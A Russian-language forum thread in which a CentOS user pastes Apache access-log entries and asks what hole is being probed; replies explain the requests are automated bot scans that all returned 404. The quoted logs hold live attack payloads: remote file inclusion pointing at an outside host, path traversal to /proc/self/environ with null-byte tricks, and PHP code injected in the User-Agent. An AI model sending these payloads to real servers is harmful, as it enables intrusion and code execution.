Не могу понят какую дырку ползуют и насколько ето опасно, а главное как проинспектит софт, когда в CentOS security report не работает?
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 316 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET //includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 304 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 312 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET //includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 304 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET //includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 304 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:79.165.160.223 — - [23/May/2009:23:44:10 +0400] «GET /engine/modules/antibot.php HTTP/1.1» 404 300 «-» «-»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 300 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 296 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 289 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»
/var/log/httpd/access_log.5:218.1.64.133 — - [21/May/2009:14:20:24 +0400] «GET /manual/en/mod/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 299 «-» «Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6»
/var/log/httpd/access_log.5:218.1.64.133 — - [21/May/2009:14:20:27 +0400] «GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 285 «-» «Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6»
/var/log/httpd/access_log.5:218.1.64.133 — - [21/May/2009:14:20:28 +0400] «GET /manual/en/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 295 «-» «Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 312 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 312 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 296 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1» 404 316 «-» «Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b»
/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:46 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»/var/log/httpd/access_log.3:62.149.163.198 — - [23/May/2009:09:29:47 +0400] «GET /manual/mod//includes/messages.inc.php?include_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1» 404 316 «-» «XXX<? echo \«w0000t\»; ?>
XXX»
Последние комментарии
- OlegL, 17 декабря 2023 года в 15:00 → Перекличка 21
- REDkiy, 8 июня 2023 года в 9:09 → Как «замокать» файл для юниттеста в Python? 2
- fhunter, 29 ноября 2022 года в 2:09 → Проблема с NO_PUBKEY: как получить GPG-ключ и добавить его в базу apt? 6
- Иванн, 9 апреля 2022 года в 8:31 → Ассоциация РАСПО провела первое учредительное собрание 1
- Kiri11.ADV1, 7 марта 2021 года в 12:01 → Логи catalina.out в TomCat 9 в формате JSON 1
А с чего вы взяли, что какую-то дырку здесь используют?
Это тупые боты обходят веб-серверы в поисках стандартных скриптов и стандартных уязвимостей в них. В данном случае ваш Apache гордо отвечает 404, поскольку такие скрипты на нем не размещены.
Спать можно спокойно.
Обьясняю — мой админ уже 2 недели дрючить меня с етим. Я ему что-то похожие и сказал, но он не отстает и подумал я раз уж умнее меня, наверное я что-то недопанимаиваю,поетому решил спросить!
Покажите ему ошибочку 404 в логах и файловую систему, в которой таких файлов нет.
Можно продемонстрировать запросы к апачу, воспроизводя их (те, что в логах) и не получая никаких результатов.
Ладно,так и сделаю! Спасибо за поддержку! Удачи!